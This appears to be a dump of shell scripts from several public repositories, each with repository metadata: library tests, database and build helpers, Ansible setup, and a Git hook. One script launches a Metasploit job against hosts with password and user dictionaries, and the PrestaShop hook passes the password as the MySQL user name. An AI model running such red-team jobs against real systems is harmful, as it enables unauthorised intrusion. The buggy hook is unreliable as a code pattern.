7e0704013db0eb0491f2d4044b14f4826008599b
|
Shell
|
cyberark/bash-lib
|
/tests-for-this-repo/helpers.bats
|
UTF-8
| 5,630
| 3.390625
| 3
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
. "${BASH_LIB_DIR}/test-utils/bats-support/load.bash"
. "${BASH_LIB_DIR}/test-utils/bats-assert-1/load.bash"
. "${BASH_LIB_DIR}/init"
# run before every test
setup(){
temp_dir="${BATS_TMPDIR}/testtemp"
mkdir "${temp_dir}"
afile="${temp_dir}/appendfile"
}
teardown(){
temp_dir="${BATS_TMPDIR}/testtemp"
rm -rf "${temp_dir}"
}
@test "bl_die exits and prints message" {
run bash -c ". ${BASH_LIB_DIR}/init; bl_die msg"
assert_output --partial msg
assert_failure
}
@test "bl_fail fails but does not exit" {
run bl_fail message
assert_failure
assert_output --partial message
}
@test "bl_spushd is quiet on stdout" {
run bl_spushd /tmp
assert_output ""
assert_success
}
@test "bl_spopd is quiet on stdout" {
pushd .
run bl_spopd
assert_output ""
assert_success
}
@test "bl_spushd dies on failure" {
run bash -c ". ${BASH_LIB_DIR}/init; bl_spushd /this-doesnt-exist"
assert_output --partial "No such file or directory"
assert_failure
}
@test "bl_spopd dies on failure" {
run bash -c ". ${BASH_LIB_DIR}/init; bl_spopd"
assert_output --partial "stack empty"
assert_failure
}
@test "bl_is_num fails with no arguments" {
run bl_is_num
assert_output ""
assert_failure
}
@test "bl_is_num fails with alphabetical input" {
run bl_is_num foo
assert_output ""
assert_failure
}
@test "bl_is_num suceeds with integer" {
run bl_is_num 123
assert_output ""
assert_success
}
@test "bl_is_num suceeds with negative integer" {
run bl_is_num -123
assert_output ""
assert_success
}
@test "bl_is_num suceeds with float" {
run bl_is_num 123.4
assert_output ""
assert_success
}
@test "bl_is_num suceeds with negative float" {
run bl_is_num -123.4
assert_output ""
assert_success
}
@test "bl_retry runs command only once if it succeeds the first time" {
retryme(){
date >> ${afile}
}
run bl_retry 3 retryme
assert_success
assert_equal $(wc -l <${afile}) 1
}
@test "bl_retry doesn't introduce delay when the command succeeds first time" {
retryme(){
date >> ${afile}
}
start=$(date +%s)
run bl_retry 3 retryme
end=$(date +%s)
assert [ "$(( start + 1 ))" -ge "${end}" ]
assert_success
}
@test "bl_retry runs n times on consecutive failure and waits between attempts" {
retryme(){
date >> ${afile}
false
}
start=$(date +%s)
run bl_retry 2 retryme
end=$(date +%s)
# introduces at least a two second delay between attempts
assert [ "$(( start + 2 ))" -le "${end}" ]
assert_failure
assert_equal $(wc -l <${afile}) 2
}
@test "bl_retry returns after first success" {
retryme(){
date >> "${afile}"
case $(wc -l < ${afile}) in
*1)
return 1
;;
*)
return 0
;;
esac
}
run bl_retry 3 retryme
assert_success
assert_equal $(wc -l <${afile}) 2
}
@test "bl_retry fails with less than two arguments" {
run bl_retry 3
assert_failure
assert_output --partial usage
assert [ ! -e "${temp_dir}/appendfile" ]
}
@test "bl_retry fails with non-integer retry count" {
run bl_retry "this" date
assert_failure
assert_output --partial number
assert [ ! -e "${temp_dir}/appendfile" ]
}
@test "bl_retry succeeds with compound statements" {
run bl_retry 3 "true && date >> ${afile}"
assert_success
assert_equal $(wc -l <${afile}) 1
}
# ***************
@test "bl_retry_constant runs command only once if it succeeds the first time" {
retry_me(){
date >> ${afile}
}
run bl_retry_constant 3 1 retry_me
assert_success
assert_equal $(wc -l <${afile}) 1
}
@test "bl_retry_constant doesn't introduce delay when the command succeeds first time" {
retry_me(){
date >> ${afile}
}
start=$(date +%s)
run bl_retry_constant 3 10 retry_me
end=$(date +%s)
assert [ "$(( start + 1 ))" -ge "${end}" ]
assert_success
}
@test "bl_retry_constant runs n times on consecutive failure and waits between attempts" {
retry_me(){
date >> ${afile}
false
}
start=$(date +%s)
run bl_retry_constant 2 2 retry_me
end=$(date +%s)
# introduces at least a two second delay between attempts
assert [ "$(( start + 2 ))" -le "${end}" ]
assert_failure
assert_equal $(wc -l <${afile}) 2
}
@test "bl_retry_constant returns after first success" {
retry_me(){
date >> "${afile}"
case $(wc -l < ${afile}) in
*1)
return 1
;;
*)
return 0
;;
esac
}
run bl_retry_constant 3 1 retry_me
assert_success
assert_equal $(wc -l <${afile}) 2
}
@test "bl_retry_constant fails with less than three arguments" {
run bl_retry_constant 3 1
assert_failure
assert_output --partial usage
assert [ ! -e "${temp_dir}/appendfile" ]
}
@test "bl_retry_constant fails with non-integer retry count" {
run bl_retry_constant "this" 1 date
assert_failure
assert_output --partial number
assert [ ! -e "${temp_dir}/appendfile" ]
}
@test "bl_retry_constant fails with non-integer interval" {
run bl_retry_constant 2 "this" date
assert_failure
assert_output --partial interval
assert [ ! -e "${temp_dir}/appendfile" ]
}
@test "bl_retry_constant succeeds with compound statements" {
run bl_retry_constant 3 1 "true && date >> ${afile}"
assert_success
assert_equal $(wc -l <${afile}) 1
}
| true
|
eca26f90a2e746a3993fcf9aa93458a0f7c01212
|
Shell
|
Mount565/binlogDumper
|
/find_sql_for_gtid.sh
|
UTF-8
| 414
| 3.546875
| 4
|
[] |
no_license
|
#!/bin/bash
if [ $# -ne 2 ];then
echo "Usage: sql file and an GTID arg are required. "
echo "This program will print all the sql statement included in the GTID which is the arg you passed."
echo "eg: $0 rollback_2018-07-26.sql d5902ad8-ec43-11e7-9df7-5254006b29ec:4567774"
exit 1;
fi
file=$1
gtid=$2
cat $file | awk -v gtid=$gtid -F 'GTID:' '{if ($2==gtid) {n=1;print $0 } else if(n==1){print $0;n=0;}}'
| true
|
21a28c144fda331b60fdce0386cb9ed8760b6852
|
Shell
|
kingman/home-lab
|
/provisioning/esp32/smart_desk/scripts/initialize-esp-idf.sh
|
UTF-8
| 1,163
| 4.5
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
set -e
set -o pipefail
clone_git_repository_if_not_cloned_already() {
destination_dir="$1"
git_repository_url="$2"
if [ -z "$destination_dir" ]; then
echo "ERROR while cloning the $git_repository_url git repository: The destination_dir variable is not set, or set to an empty string"
exit 1
fi
if [ -d "$destination_dir/.git" ]; then
echo "$destination_dir already exists and is a Git repository. Pulling the latest changes..."
echo "Updating $git_repository_url in $destination_dir"
git -C "$destination_dir" pull --ff-only
else
mkdir -p "$destination_dir"
echo "Cloning $git_repository_url in $destination_dir"
git clone --recursive "$git_repository_url" "$destination_dir"
fi
unset destination_dir
unset git_repository_url
}
ESP_IDF_PATH="$1"
echo "Setting up ESP-IDF in $ESP_IDF_PATH..."
clone_git_repository_if_not_cloned_already "$ESP_IDF_PATH" "https://github.com/espressif/esp-idf.git"
echo "$ESP_IDF_PATH contents:"
ls -al "$ESP_IDF_PATH"
cmake --version
echo "Running the ESP-IDF installation script..."
"$ESP_IDF_PATH"/install.sh
| true
|
228320d7cb6ed5e90c3e3b106c72ecadf085ef08
|
Shell
|
TomYang9/attack-surface-framework
|
/redteam/metasploit/start
|
UTF-8
| 1,774
| 3.21875
| 3
|
[
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
if test "f$1" "=" "f"
then
echo "Error, please specify a JobID"
exit 1
fi
. /opt/asf/tools/scripts/arguments metasploit $1
DATE_STAMP=`date +"%Y%m%d%H%M%S"`
JOB_FOLDERS="/home/asf/jobs"
JOB_FOLDER="$JOB_FOLDERS/$1"
JOB_OUTPUT_FOLDER="$JOB_FOLDER/$DATE_STAMP"
TERM="xterm"
if ! test -e "$JOB_FOLDER"
then
echo "Error, JobID $1 is invalid"
exit 1
fi
if test -e "JOB_FOLDER/.lock"
then
echo "Error, process is already running"
exit 1
fi
echo > "$JOB_FOLDER/.lock"
cd /opt/asf/frontend/asfui
. bin/activate
python3 /opt/asf/frontend/asfui/manage.py remaster_input --input JobID:$1 --parser host --output "$JOB_FOLDER/app.input"
mkdir -p $JOB_OUTPUT_FOLDER
cp /opt/asf/tools/dicts/default.dict "$JOB_FOLDER/app.dict"
cp /opt/asf/tools/dicts/users.dict "$JOB_FOLDER/app.users"
for mode in input asf dict users
do cp -v "$JOB_FOLDER/app.$mode" "$JOB_OUTPUT_FOLDER/app.$mode"
done
cp -v "$JOB_FOLDER/msf.asfui" "$JOB_OUTPUT_FOLDER/msf.asfui"
echo "python3 /opt/asf/frontend/asfui/manage.py msfwrapper --input=$JOB_OUTPUT_FOLDER/app.input --msfconfig=$JOB_OUTPUT_FOLDER/msf.asfui --output=$JOB_OUTPUT_FOLDER/app.report.txt 2>&1 > $JOB_OUTPUT_FOLDER/app.log"
python3 /opt/asf/frontend/asfui/manage.py msfwrapper --input=$JOB_OUTPUT_FOLDER/app.input --msfconfig=$JOB_OUTPUT_FOLDER/msf.asfui --output=$JOB_OUTPUT_FOLDER/app.report.txt 2>&1 > "$JOB_OUTPUT_FOLDER/app.log" &
#mkdir -p $JOB_OUTPUT_FOLDER/results/
#cp -v $JOB_OUTPUT_FOLDER/app.report.txt $JOB_OUTPUT_FOLDER/results/app.report.txt
JOB_PID=$!
echo $JOB_PID>"$JOB_FOLDER/pid"
wait $PID
#python3 /opt/asf/frontend/asfui/manage.py remaster_output --parser=patator.ssh --debug --input="$JOB_OUTPUT_FOLDER/results/RESULTS.csv" --output=JobID:$1
rm -v "$JOB_FOLDER/pid"
rm -v "$JOB_FOLDER/.lock"
| true
|
a64a646a61b4e1abc7bc677fa46d6ef1d8b39893
|
Shell
|
mertinger/cf-checker
|
/test_files/test.sh.old
|
UTF-8
| 3,065
| 3.25
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/ksh
#
#cd Test_Files
outdir=tests_output.$$
mkdir $outdir
export PYTHONPATH=/home/ros/software/python/cdat-lite:/home/ros/software/python/udunits
std_name_table=http://cfconventions.org/Data/cf-standard-names/current/src/cf-standard-name-table.xml
area_table=http://cfconventions.org/Data/area-type-table/current/src/area-type-table.xml
# Testing w/ CDAT-5.2 and UDUNITS2
#export PATH=/home/ros/software/CDAT-5.2-cdms/bin:$PATH
#export PYTHONPATH=/home/ros/software/CDAT-5.2-cdms/lib/python2.5/site-packages:/home/ros/git-projects/cf-checker/src
#export PYTHONPATH=/home/ros/software/CDAT-5.2-cdms/lib/python2.5/site-packages:/home/ros/cf-checker/branches/r159_cf-1.6/src
#export LD_LIBRARY_PATH=/home/ros/software/udunits2/lib
#export UDUNITS=/home/ros/software/udunits2/share/udunits/udunits2.xml
# udunits-2.1.19
#export LD_LIBRARY_PATH=/home/ros/software/udunits-2.1.19/lib
#export UDUNITS=/home/ros/software/udunits-2.1.19/share/udunits/udunits2.xml
#cfchecker="/home/ros/software/CDAT-5.2-cdms/bin/python ../src/cfchecker/cfchecks.py"
# Python2.6, numpy1.8.0, udunits-2.1.19
export PYTHONPATH=/home/ros/software/cf-checker/lib64/python2.6/site-packages:/home/ros/git-projects/cf-checker/src
export LD_LIBRARY_PATH=/usr/local/netcdf_gnu/lib:/home/ros/software/cf-checker/lib
export UDUNITS=/home/ros/software/cf-checker/share/udunits/udunits2.xml
cfchecker="/usr/bin/python /home/ros/bin/cfchecks-2.0.6a.py"
failed=0
for file in `ls *.nc`
do
if test $file == "badc_units.nc"
then
# Check --badc option (Note: Need to set path to badc_units.txt in cfchecks.py)
$cfchecker --badc $file -s $std_name_table > $outdir/$file.out 2>&1
elif test $file == "stdName_test.nc"
then
# Check --cf_standard_names option
$cfchecker -s ./stdName_test_table.xml -a $area_table $file > $outdir/$file.out 2>&1
elif test $file == "CF_1_2.nc"
then
# CF-1.2
$cfchecker -s $std_name_table -v 1.2 $file > $outdir/$file.out 2>&1
elif test $file == "flag_tests.nc"
then
# CF-1.3
$cfchecker -s $std_name_table -v 1.3 $file > $outdir/$file.out 2>&1
elif [[ $file == "Trac049_test1.nc" || $file == "Trac049_test2.nc" ]]
then
# CF-1.4
$cfchecker -s $std_name_table -a $area_table -v 1.4 $file > $outdir/$file.out 2>&1
else
# Run the checker on the file
$cfchecker -s $std_name_table -v 1.0 $file > $outdir/$file.out 2>&1
fi
# Check the output against what is expected
result=${file%.nc}.check
diff $outdir/$file.out $result >/dev/null
if test $? == 0
then
echo $file: Success
rm $outdir/$file.out
else
echo $file: Failed
#rc=$((failed += 1))
failed=`expr $failed + 1`
fi
done
# Print Test Results Summary
echo ""
if [[ $failed != 0 ]]
then
echo "****************************"
echo "*** $failed Tests Failed ***"
echo "****************************"
else
echo "****************************"
echo "*** All Tests Successful ***"
echo "****************************"
fi
# Check that the script options
# --cf_standard_names
# --udunits
# --coards
| true
|
3827a76b89aa22fb19af14ce23cc61de5276c829
|
Shell
|
injectedfusion/hedera-gcs-setup
|
/setup.sh
|
UTF-8
| 2,177
| 2.9375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Setup Script for hedera-gcs-setup
mkdir -pv ~/Desktop/hedera-mirror-node/vars ~/Desktop/hedera-mirror-node/roles
touch ~/Desktop/hedera-mirror-node/inventory.ini
cat >> ~/Desktop/hedera-mirror-node/inventory.ini <<- _EOF_
[mirrornode]
IPADDRESS ansible_ssh_user=USERNAME
_EOF_
touch ~/Desktop/hedera-mirror-node/roles/requirements.yml
cat >> ~/Desktop/hedera-mirror-node/roles/requirements.yml <<- _EOF_
---
# from github
- src: https://github.com/injectedfusion/hedera-gcs-setup
...
_EOF_
touch ~/Desktop/hedera-mirror-node/vars/project-id.json
cat >> ~/Desktop/hedera-mirror-node/vars/project-id.json <<- _EOF_
{
"access_key":"GOOG1E...",
"secret_key":"H/4...",
"project_id":"Your-Google-Project-ID"
}
_EOF_
touch ~/Desktop/hedera-mirror-node/server_build.yml
cat >> ~/Desktop/hedera-mirror-node/server_build.yml <<- _EOF_
---
- hosts: mirrornode
vars_files:
- ./vars/project-id.json
roles:
- hedera-gcs-setup
...
_EOF_
# Install Ansible Role
ansible-galaxy install -r ~/Desktop/hedera-mirror-node/roles/requirements.yml --force
touch ~/Desktop/hedera-mirror-node/install_services.sh
cat >> ~/Desktop/hedera-mirror-node/install_services.sh <<- _EOF_
#!/bin/bash
ansible-playbook -i ~/Desktop/hedera-mirror-node/inventory.ini ~/Desktop/hedera-mirror-node/server_build.yml --tags "install"
_EOF_
touch ~/Desktop/hedera-mirror-node/start_services.sh
cat >> ~/Desktop/hedera-mirror-node/start_services.sh <<- _EOF_
#!/bin/bash
ansible-playbook -i ~/Desktop/hedera-mirror-node/inventory.ini ~/Desktop/hedera-mirror-node/server_build.yml --tags "start_services"
_EOF_
touch ~/Desktop/hedera-mirror-node/stop_services.sh
cat >> ~/Desktop/hedera-mirror-node/stop_services.sh <<- _EOF_
#!/bin/bash
ansible-playbook -i ~/Desktop/hedera-mirror-node/inventory.ini ~/Desktop/hedera-mirror-node/server_build.yml --tags "stop_services"
_EOF_
chmod +x ~/Desktop/hedera-mirror-node/install_services.sh
chmod +x ~/Desktop/hedera-mirror-node/start_services.sh
chmod +x ~/Desktop/hedera-mirror-node/stop_services.sh
echo "Project Directory Established"
echo "Now go update hedera-mirror-node/inventory.ini and hedera-mirror-node/vars/project-id.json"
| true
|
9c4860028d14dd606113ddd44597af29ee12c7c6
|
Shell
|
Jpocas3212/aur
|
/brick/PKGBUILD
|
UTF-8
| 1,250
| 2.71875
| 3
|
[] |
no_license
|
# Maintainer: Andrew Krasichkov <buglloc _ at _ yandex _ dot _ru>
pkgname=brick
pkgver=0.1.26.31
pkgrel=1
pkgdesc="Unofficial Bitrix24 messenger client"
arch=('i686' 'x86_64')
url="https://github.com/buglloc/brick"
license=("MIT")
depends=("alsa-lib" "desktop-file-utils" "gconf" "libxtst" "libxss" "xdg-utils" "gtk2" "libnotify" "nss")
optdepends=()
conflicts=("brick-unity" "brick-git" "brick-unity-git")
makedepends=("p7zip" "cmake")
install=${pkgname}.install
source=("https://github.com/buglloc/brick/archive/v${pkgver}.tar.gz")
source_i686=("https://github.com/buglloc/cef-builds/raw/79c6f03ac3d4eb3332d6c374d9a9cb0fa3be742b/libs/cef-i686.tar.gz")
sha256sums=("f96affeb0d2270057f81e0123376c1830539d8a3c69efb3cc4dde0b5bf6459b2")
sha256sums_i686=("134454435e24ecae8be9430cb36e2a6095f780443e2e09ac05a4e41beb85d253")
build() {
cd ${srcdir}
if [ $CARCH == "i686" ];
then
rm -f "brick-${pkgver}/Release/*"
cp -arf cef-i686/* "brick-${pkgver}/Release"
fi
mkdir -p out
cd out
cmake -DCMAKE_INSTALL_PREFIX=${pkgdir} -DUNITY_DESKTOP=OFF "../brick-${pkgver}"
make
}
package() {
cd ${srcdir}/out
make install
install -dm755 "${pkgdir}/usr/bin"
rm -f "${pkgdir}/usr/bin/brick"
ln -s /opt/brick/brick "${pkgdir}/usr/bin/brick"
}
| true
|
ed24d649de85c36c83f18f80b214839105d7f1a4
|
Shell
|
Asenar/prestashop-devtools
|
/.git-templates/prepareAutoupgrade/hooks/pre-commit
|
UTF-8
| 937
| 3.265625
| 3
|
[] |
no_license
|
#!/bin/sh
#
# file : pre-commit
# desc : This hook dump your prestashop database in dump.sql and add this file (git add) before the commit.
# The dump is made with --skip-extended-insert option to make database state comparaison really easy.
# This hook is the reciprocal of post-checkout.
#
#
# author : Michaël Marineti
# creation : 2012-04-30
# modified : 2012-05-28
#
# CHANGELOG
# 2012-05-28
# clean code, add comments
db_to_save=`grep DB_NAME config/settings.inc.php |awk -F\' '{print $4}'`
dbuser="`grep DB_USER config/settings.inc.php |awk -F\' '{print $4}'`"
dbpass="`grep DB_PASSWD config/settings.inc.php |awk -F\' '{print $4}'`"
if (test -z $dbpass) then
mysql_conn_string="-u$dbuser"
else
mysql_conn_string="-u$dbpass -p$dbpass"
fi
mysqldump $mysql_conn_string --skip-comments --skip-extended-insert $db_to_save > dump.sql
if (test $? -ne 0) then
echo "error on mysqldump"
exit 1
fi
git add dump.sql
| true
|
8951f62253dd61a2938bddbeec37be243713a8e3
|
Shell
|
kinshuk-jain/anmonline
|
/scripts/run-server.sh
|
UTF-8
| 703
| 3.90625
| 4
|
[] |
no_license
|
#!/bin/bash
# download file from s3
aws s3 cp s3://kinarva/docustore.zip .
# rename the file
NAME="docustore"_`date +%Y_%m_%d_%H_%M_%S`
mv docustore.zip $NAME".zip"
# unzip it
unzip $NAME".zip" -d "$NAME"
rm $NAME".zip"
cd $NAME
# Copy pm2 ecosystem file
cp ../ecosystem.config.js .
# restart server
pm2 restart ecosystem.config.js --env production
cd ../
DEST_FILE=./folder_to_delete_on_new_deployment
# if previous deployment exists, read its name from DEST_FILE and delete folder
if [ -f "$DEST_FILE" ]
then
PREV_DEPLOYMENT=`cat $DEST_FILE`
rm -rf "$PREV_DEPLOYMENT"
fi
# save NAME to a file. This will be the name of folder to delete on next deployment
echo "$NAME" > "$DEST_FILE"
| true
|
91bee36ed26071e9f6c68c8eca5b256c0b66e8e4
|
Shell
|
castle-sky/verdaccio
|
/scripts/e2e-setup-ci.sh
|
UTF-8
| 256
| 3.078125
| 3
|
[
"LicenseRef-scancode-free-unknown",
"MIT",
"CC-BY-4.0",
"CC-BY-NC-SA-4.0",
"CC-BY-SA-4.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/usr/bin/env bash
set -e
HERE_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" >/dev/null 2>&1 && pwd)"
TEMP_DIR="$(mktemp -d)"
cd "${TEMP_DIR}"
echo $TEMP_DIR
echo $HERE_DIR
git config --global user.email "you@example.com"
git config --global user.name "John Doe"
| true
|
80a610b69f6c2190b9ac65b75d24afcdcb7422cb
|
Shell
|
tommibergman/crescendo-pp
|
/create_jobfiles.sh
|
UTF-8
| 541
| 3.421875
| 3
|
[] |
no_license
|
#!/bin/bash
if [[ -n "${1}" ]]
then
y1=${1}
else
echo "usage ${0} startyear [endyear]"
exit
fi
#if no end
[[ -n "${2}" ]] && y2=${2} || y2=${1}
if [[ ${y2} -lt ${y1} ]]
then
echo "usage ${0} startyear [endyear]"
echo "endyear must be larger than or equal to staryear"
exit
fi
for yyyy in $(eval echo "{$y1..$y2}")
do
sed "s/yyyy/${yyyy}/g" pp_ifs_monthly.job.tmpl > pp_ifs_monthly.${yyyy}.job
sed "s/yyyy/${yyyy}/g" pp_ifs+tm5_merge_copy.job.tmpl > pp_ifs+tm5_merge_copy.${yyyy}.job
echo $yyyy
done
| true
|
8918f845b9edf868bed59bc0b3cae086a925354e
|
Shell
|
ggiammat/r2
|
/application-controller/eels-application-controller/e2c-eels-ac/src/main/resources/vm/eelsdeploy_light.sh
|
UTF-8
| 445
| 2.84375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#install application controller
IP_AC="${1}"
scp ../target/E2CEelsAC-1.1-SNAPSHOT.jar root@$IP_AC:eelsAC/
scp ../applicationcontroller.properties root@$IP_AC:eelsAC/
scp ../eelsapplication.properties root@$IP_AC:eelsAC/
#install application local agent
shift
for ipaddress in $@
do
scp ../../E2CEelsALA/target/E2CEelsALA-1.1-SNAPSHOT.jar root@$ipaddress:eelsALA/
scp ../../E2CEelsALA/eelslocalagent.properties root@$ipaddress:eelsALA/
done
| true
|
f5d0fa34d1a01dec6bac15255ab31c85084a7075
|
Shell
|
stoe/dotfiles
|
/.zshrc
|
UTF-8
| 1,163
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/zsh
export PATH=$HOME/bin:/usr/local/bin:$PATH
# Load the shell dotfiles, and then some:
# * ~/.path can be used to extend `$PATH`.
# * ~/.extra can be used for other settings you don’t want to commit.
for file in ~/.{exports,aliases,functions,extra}; do
[ -r "$file" ] && [ -f "$file" ] && source "$file";
done;
unset file;
setopt HIST_IGNORE_ALL_DUPS # Delete old recorded entry if new entry is a duplicate.
setopt HIST_IGNORE_SPACE # Don't record an entry starting with a space.
setopt HIST_SAVE_NO_DUPS # Don't write duplicate entries in the history file.
autoload -Uz colors && colors
# initialize autocomplete here, otherwise functions won't be loaded
if type brew &>/dev/null; then
FPATH=$(brew --prefix)/share/zsh/site-functions:$FPATH
fi
if type gh &>/dev/null; then
eval "$(gh completion -s zsh)"
fi
autoload -Uz compinit
compinit
PAGER=
# -- Oh My Zsh -----------------------------------------------------------------
# Path to your oh-my-zsh installation.
export ZSH=$HOME/.oh-my-zsh
ZSH_THEME="af-magic"
plugins=(
colored-man-pages
git
gitignore
golang
node
npm
nvm
)
source $ZSH/oh-my-zsh.sh
| true
|
f6250d0b5989c5f047c863e21048200c9a08ebae
|
Shell
|
cancenik/translation-variation
|
/SCRIPTS/BASH_SCRIPTS/submit_pickrell_rnaseq.sh
|
UTF-8
| 287
| 2.515625
| 3
|
[] |
no_license
|
#!/bin/bash
PICKRELL=/srv/gs1/projects/snyder/ccenik/PICKRELL_RNASEQ
cd $PICKRELL
for dir in $(find . -maxdepth 1 -mindepth 1 -name 'GM*' -type d -printf '%f\n')
do
cd $PICKRELL/$dir/
pwd
zcat * > Merged_Reads.fastq
qsub ~/SCRIPTS/BASH_SCRIPTS/alignment_strategy_pickrell_qsub.sh
done
| true
|
5323b336bf25fc72805be67635b8df6dc2d09628
|
Shell
|
pizzanfruit/react-remote-container
|
/.vscode/docker-network-disconnect.sh
|
UTF-8
| 219
| 2.96875
| 3
|
[] |
no_license
|
# !/bin/sh
DEVCONTAINER_NETWORK_NAME=$1
if [ -z "$DEVCONTAINER_NETWORK_NAME" ]; then
echo "Please provide network to disconnect from"
exit 1;
fi
docker network disconnect $DEVCONTAINER_NETWORK_NAME $HOSTNAME
| true
|
c2e1a32dc6153bb5e2955dc97e54a9ee8ebd0723
|
Shell
|
project-oak/oak
|
/scripts/build_reproducibility_index
|
UTF-8
| 1,061
| 3.96875
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#
# Check that artifacts can be reproducibly built, both when re-building them on the same machine
# over time, but also when built on different machines (e.g. locally vs on GCP).
#
# This script should be re-run every time any of these artifacts changes, and should be checked in
# so that we can enforce in CI that the hashes are indeed consistent.
readonly SCRIPTS_DIR="$(dirname "$0")"
# shellcheck source=scripts/common
source "$SCRIPTS_DIR/common"
# Convert the input arguments to a list of artifacts that are expected to be reproducibly built.
readonly REPRODUCIBLE_ARTIFACTS=( "$@" )
# Index file containing hashes of the reproducible artifacts, alongside their file names.
readonly REPRODUCIBILITY_INDEX='./reproducibility_index'
# Wipe out everything in the reproducibility index.
echo "" | tee "${REPRODUCIBILITY_INDEX}"
# Regenerate the index file by appending to it decoded base64 digests of the artifacts.
for encoded in "${REPRODUCIBLE_ARTIFACTS[@]}"
do
echo "${encoded}" | base64 -d | tee -a "${REPRODUCIBILITY_INDEX}"
done
| true
|
d9ae54534a7beb7d65d9be510a7d14d22db189c6
|
Shell
|
allisterke/invest-lab
|
/concept/decorate-cz.sh
|
UTF-8
| 508
| 2.734375
| 3
|
[] |
no_license
|
#!/bin/bash
KEY=重组
while read -r LINE; do
echo "$LINE" |\
perl -ne 's/([[:digit:]]+年[[:digit:]]+月[[:digit:]]+日|[[:digit:]]+年[[:digit:]]+月|[[:digit:]]+年)((?:(?![[:digit:]]+年[[:digit:]]+月[[:digit:]]+日|[[:digit:]]+年[[:digit:]]+月|[[:digit:]]+年).)*)('$KEY')/<span style="font-style:italic; font-weight:bolder; font-size:xx-large; background:lightgreen;">\1<\/span>\2<span style="color:red; font-style:italic; font-weight:bolder; font-size:xx-large;">\3<\/span>/g; print;'
done
| true
|
9347723670a03ea16c6b4446279433c052c26451
|
Shell
|
ryanplusplus/hld-save-utils
|
/edit.sh
|
UTF-8
| 343
| 2.734375
| 3
|
[
"MIT"
] |
permissive
|
TMPDIR=`mktemp -d`
mkdir -p $TMPDIR
cp $1 `dirname $1`/backup.sav
cat $1 | base64 --decode > $TMPDIR/decoded
dd count=60 if=$TMPDIR/decoded of=$TMPDIR/header bs=1 >& /dev/null
dd skip=60 if=$TMPDIR/decoded of=$TMPDIR/body bs=1 >& /dev/null
vi $TMPDIR/body
cat $TMPDIR/header $TMPDIR/body > $TMPDIR/modified
cat $TMPDIR/modified | base64 > $1
| true
|
8cbfd43372d7a97c887aa47f2e4ceaf2bb3f11a8
|
Shell
|
stiles69/bin
|
/Set-MOTD.sh
|
UTF-8
| 1,197
| 3.296875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#===============================================================================
#
# FILE: Set-MOTD.sh
#
# USAGE: ./Set-MOTD.sh
#
# DESCRIPTION:
#
# OPTIONS: ---
# REQUIREMENTS: ---
# BUGS: ---
# NOTES: ---
# AUTHOR: Brett Salemink (), admin@roguedesigns.us
# ORGANIZATION: Rogue Designs
# CREATED: 07/18/2018 17:16
# REVISION: ---
#===============================================================================
set -o nounset # Treat unset variables as an error
. $HOME/lib/sh/funcDisplayHostname.sh
echo "What do you want for a contact name?"
read CONTACTNAME
echo "What is your contact email address?"
read CONTACTEMAIL
HOSTER="$(DisplayHostname)"
echo "========================================================" > /tmp/Motd
echo " Welcome to Linux" >> /tmp/Motd
echo "Custom Linux Install by $CONTACTNAME <$CONTACTEMAIL>." >> /tmp/Motd
echo "========================================================" >> /tmp/Motd
echo " Rogue Designs $HOSTER" >> /tmp/Motd
echo "========================================================" >> /tmp/Motd
sudo cp /tmp/Motd /etc/motd
| true
|
4930ac60f826d08b44d20997e95a7c6c2782370d
|
Shell
|
raphaelmeyer/playground-6pnwam0r
|
/cmake-project/common.sh
|
UTF-8
| 800
| 4
| 4
|
[] |
no_license
|
#!/bin/bash
function fail {
exit_code=$1
message=$2
echo "TECHIO> message --channel \"Hint!\" ${message}"
echo "TECHIO> success false"
exit ${exit_code}
}
function check_failure {
exit_code=$1
if [ ${exit_code} -ne 0 ]; then
fail ${exit_code} "CMake build failed."
fi
}
function run_cmake {
project_dir=$1
build_dir=${project_dir}/build
set -o pipefail
echo "! $(pwd) > mkdir -p ${build_dir}"
mkdir -p ${build_dir}
echo "! $(pwd) > cd ${build_dir}"
cd ${build_dir}
echo "! $(pwd) > cmake -G Ninja ${project_dir}"
cmake -G Ninja ${project_dir} | sed 's/^/ /'
check_failure $?
echo "! $(pwd) > cd ${project_dir}"
cd ${project_dir}
echo "! $(pwd) > cmake --build ${build_dir}"
cmake --build ${build_dir} | sed 's/^/ /'
check_failure $?
}
| true
|
e3cbd9f57155671677b3f931d29d9b1ffaa4acd3
|
Shell
|
redhat-cip/osp-delivery-tools
|
/analyse_heat.sh
|
UTF-8
| 2,061
| 3.71875
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#
# Copyright (C) 2015 Red Hat, Inc.
#
# Author: Hugo Rosnet <hrosnet@redhat.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
OUTPUT_TO_FILE=false
STACK=overcloud
LEVEL=3
FILE="deploy-fail-$(date '+%Y%m%d-%H%M%S').txt"
# Matching for "server_id": "c18426be-fb53-48e7-9dc5-4d96b394ea69"
MATCH_DEPLOY='[[:alnum:]]\{8\}-\([[:alnum:]]\{4\}-\)\{3\}[[:alnum:]]\{12\}'
function _usage() {
echo "This script allow to have all errors/server name/IP from resources that failed during a deployment."
echo ""
echo "Usage: ${0}"
echo " -f : Output to file 'deploy-fail-DATE' as well. (default: False)"
echo " -s : Name of the stack to analyze. (default: overcloud)"
echo " -l : Level of depth for the stack. (default: 3)"
echo ""
echo "Think about sourcing your FILErc, this script will NOT do it."
}
while getopts "fs:l:h" opt; do
case ${opt} in
f)
OUTPUT_TO_FILE=true
;;
s)
STACK=${OPTARG}
;;
l)
LEVEL=${OPTARG}
;;
h)
_usage
exit 0
;;
\?)
_usage
exit 1
